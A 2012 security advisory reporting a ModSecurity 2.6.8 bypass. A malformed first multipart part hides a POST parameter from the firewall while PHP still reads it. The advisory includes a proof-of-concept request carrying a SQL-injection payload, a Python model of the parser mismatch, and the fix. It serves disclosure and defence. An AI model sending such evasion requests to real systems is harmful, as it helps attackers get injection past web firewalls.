ModSecurity 2.6.8 Bypass

17 Oct 2012. Reported by Bernhard Mueller. Source: packetstormsecurity.com

ModSecurity 2.6.8 multipart/invalid part ruleset bypass, fixed in 2.7.

SEC Consult Vulnerability Lab Security Advisory < 20121017-0 >  
=======================================================================  
title: ModSecurity multipart/invalid part ruleset bypass  
product: ModSecurity  
vulnerable version: <= 2.6.8  
fixed version: 2.7.0  
CVE number: -  
impact: Depends what you use it for  
homepage: http://www.modsecurity.org/  
found: 2012-10-12  
by: Bernhard Mueller  
SEC Consult Vulnerability Lab  
https://www.sec-consult.com  
=======================================================================  
  
Vendor/product description:  
---------------------------  
ModSecurity for Apache is a web server plug-in for the Apache web server  
platform. This is the original, most mature and deployed ModSecurity module.  
This module is maintained by the Trustwave SpiderLabs Research Team.  
  
URL: http://www.modsecurity.org/projects/modsecurity/apache/  
  
  
Vulnerability overview/description:  
-----------------------------------  
Validation of POST parameters can be bypassed on Apache/PHP installations by  
sending specially formed multipart requests. A POST parameter's content can be  
hidden from ModSecurity by prepending an invalid part. This first part  
contains only a Content-Disposition header and has an additional carriage  
return inserted at the end of the line ([\r\r\n]). This is followed by a  
boundary in the next line and another Content-Disposition header with a  
filename. The request content looks like this (newlines are all \r\n except in  
line 2).  
  
--A  
Content-Disposition: form-data; name="id"[\r][\r][\n]  
--A  
Content-Disposition: form-data; name="lol"; filename="x"  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
--A--  
  
ModSecurity skips what it believes to be an invalid first part and proceeds to  
parse the second part. This part is treated as a file and not checked against  
the ruleset.  
  
PHP however treats the whole thing as a single part and processes only the  
first Content-Disposition header, ignoring the second one. In the opinion of  
PHP this request contains a POST parameter with the name specified in the  
first header.  
  
  
Proof of concept:  
-----------------  
  
wut.php:  
--------  
  
<?php echo $_POST['xxx']; ?>  
  
  
POST request:  
-------------  
  
POST /wut.php HTTP/1.1  
Content-Type: multipart/form-data; boundary=A  
Content-Length: 161  
  
--A  
Content-Disposition: form-data; name="xxx"[\r][\r][\n]  
--A  
Content-Disposition: form-data; name="yyy"; filename="z"  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
--A--  
  
  
Output:  
-------  
  
1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--  
  
(any change in the header should produce a 403)  
  
  
Vulnerable / tested versions:  
-----------------------------  
  
This works with ModSecurity up to version 2.6.8.  
  
  
Vendor contact timeline:  
------------------------  
2012-10-11: Contacted ModSecurity  
2012-10-15: ModSecurity guys fixed it  
2012-10-16: New ModSecurity release 2.7.0  
2012-10-17: Public release of advisory  
  
  
Solution:  
---------  
To mitigate this bypass method, upgrade to ModSecurity 2.7.0 and make sure  
that the MULTIPART_INVALID_PART flag is set in the multipart strict validation  
rule. Add the line:  
  
IQ %{MULTIPART_INVALID_PART}, \  
  
to the SecRule MULTIPART_STRICT_ERROR in your ModSecurity configuration file.  
  
Download is available at:  
  
http://www.modsecurity.org/download/  
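The parser differential described in the overview, and the effect of the strict-validation fix in the solution section, can be reproduced with two small parsers. The code below is an added example written for this page; it is not ModSecurity's or PHP's code, and the function names (`waf_view`, `app_view`, `request_allowed`, `InvalidPart`) are the example's own. `waf_view` is a boundary-driven parser that treats a part whose header block is not terminated by an empty line as invalid, either skipping it (the 2.6.8 behaviour the advisory describes) or rejecting the whole request (what a strict rule that denies on an invalid part achieves). `app_view` is a line-driven header reader modeled on the advisory's description of PHP: header lines are read until an empty line, a line without a colon is folded into the previous header, and the first Content-Disposition wins. The request body is constructed after the proof of concept.

```python
import re

CRLF = b"\r\n"
BOUNDARY = b"A"

# Constructed body modeled on the advisory's PoC; the first header line ends in CR CR LF.
BODY = (
    b"--A\r\n"
    b'Content-Disposition: form-data; name="xxx"\r\r\n'
    b"--A\r\n"
    b'Content-Disposition: form-data; name="yyy"; filename="z"\r\n'
    b"\r\n"
    b"1 UNION SELECT 1,2,3,4,5,6,7,8,9,10--\r\n"
    b"--A--\r\n"
)


class InvalidPart(ValueError):
    """Raised by the strict WAF model when a part's header block is malformed."""


def _disposition_params(value: bytes) -> dict:
    """Extract name="..." and filename="..." from a Content-Disposition value."""
    return {m.group(1): m.group(2) for m in re.finditer(rb'(\w+)="([^"]*)"', value)}


def split_parts(body: bytes, boundary: bytes) -> list:
    """Split a multipart body at boundary lines into raw parts (headers + data)."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):                              # closing --boundary--
            break
        chunk = chunk[2:] if chunk.startswith(CRLF) else chunk   # CRLF after the boundary
        chunk = chunk[:-2] if chunk.endswith(CRLF) else chunk    # CRLF before the next one
        parts.append(chunk)
    return parts


def waf_view(body: bytes, boundary: bytes, skip_invalid: bool) -> dict:
    """Boundary-driven parse (toy WAF model): the ARGS and file parts it would inspect."""
    args, files = {}, []
    for raw in split_parts(body, boundary):
        if CRLF + CRLF not in raw:          # header block never terminated by an empty line
            if skip_invalid:
                continue                    # 2.6.8 behaviour as described: ignore the part
            raise InvalidPart(raw)          # strict: the whole request is rejected
        headers, data = raw.split(CRLF + CRLF, 1)
        params = {}
        for line in headers.split(CRLF):
            key, _, value = line.partition(b":")
            if key.strip().lower() == b"content-disposition":
                params = _disposition_params(value)
        if b"filename" in params:
            files.append(params.get(b"name"))   # uploads are not inspected as ARGS
        elif b"name" in params:
            args[params[b"name"]] = data
    return {"args": args, "files": files}


def app_view(body: bytes, boundary: bytes) -> dict:
    """Line-driven parse modeled on the advisory's description of PHP (assumption)."""
    args = {}
    rest = body
    if not rest.startswith(b"--" + boundary + CRLF):
        return args
    rest = rest[len(boundary) + 4:]
    while True:
        headers = []
        while True:                         # read header lines up to an empty line
            line, _, rest = rest.partition(b"\n")
            line = line[:-1] if line.endswith(b"\r") else line   # strip one CR only
            if line == b"":
                break
            if b":" in line:
                key, _, value = line.partition(b":")
                headers.append((key.strip().lower(), value.lstrip()))
            elif headers:                   # "--A" is not a boundary here, it is folded
                key, prev = headers.pop()
                headers.append((key, prev + line))
        data, sep, rest = rest.partition(CRLF + b"--" + boundary)
        disposition = next((v for k, v in headers if k == b"content-disposition"), b"")
        params = _disposition_params(disposition)   # first Content-Disposition wins
        if b"name" in params and b"filename" not in params:
            args[params[b"name"]] = data
        if not sep or rest.startswith(b"--"):
            return args
        rest = rest[2:] if rest.startswith(CRLF) else rest


def request_allowed(body: bytes, boundary: bytes, strict: bool) -> bool:
    """Policy check: strict mode denies any request that contains an invalid part."""
    try:
        waf_view(body, boundary, skip_invalid=not strict)
    except InvalidPart:
        return False
    return True


if __name__ == "__main__":
    print("WAF sees:", waf_view(BODY, BOUNDARY, skip_invalid=True))
    print("App sees:", app_view(BODY, BOUNDARY))
    print("strict deny:", not request_allowed(BODY, BOUNDARY, strict=True))
```

Run as-is, the WAF model reports no parameters and one file part named `yyy`, while the application model reports a parameter `xxx` whose value is the payload; that gap is the bypass. With `strict=True` the same body is denied outright, which is the behaviour the `MULTIPART_INVALID_PART` flag in the strict-validation rule provides. Skipping a malformed part is never safe for a filter that sits in front of a more lenient consumer; the only sound policy is to reject the request.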
  
  
  
Advisory URL:  
--------------  
https://www.sec-consult.com/en/advisories.html  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
The SEC Consult Group  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
  
Office Singapore  
4 Battery Road  
#25-01 Bank of China Building  
Singapore (049908)  
Mail: office at sec-consult dot sg  
  
  
Check out our blog at:  
http://blog.sec-consult.com/  
  
  
And this thing here:  
http://wordpress.org/extend/plugins/mvis-security-center/  
  
  
EOF B. Mueller / October 2012  
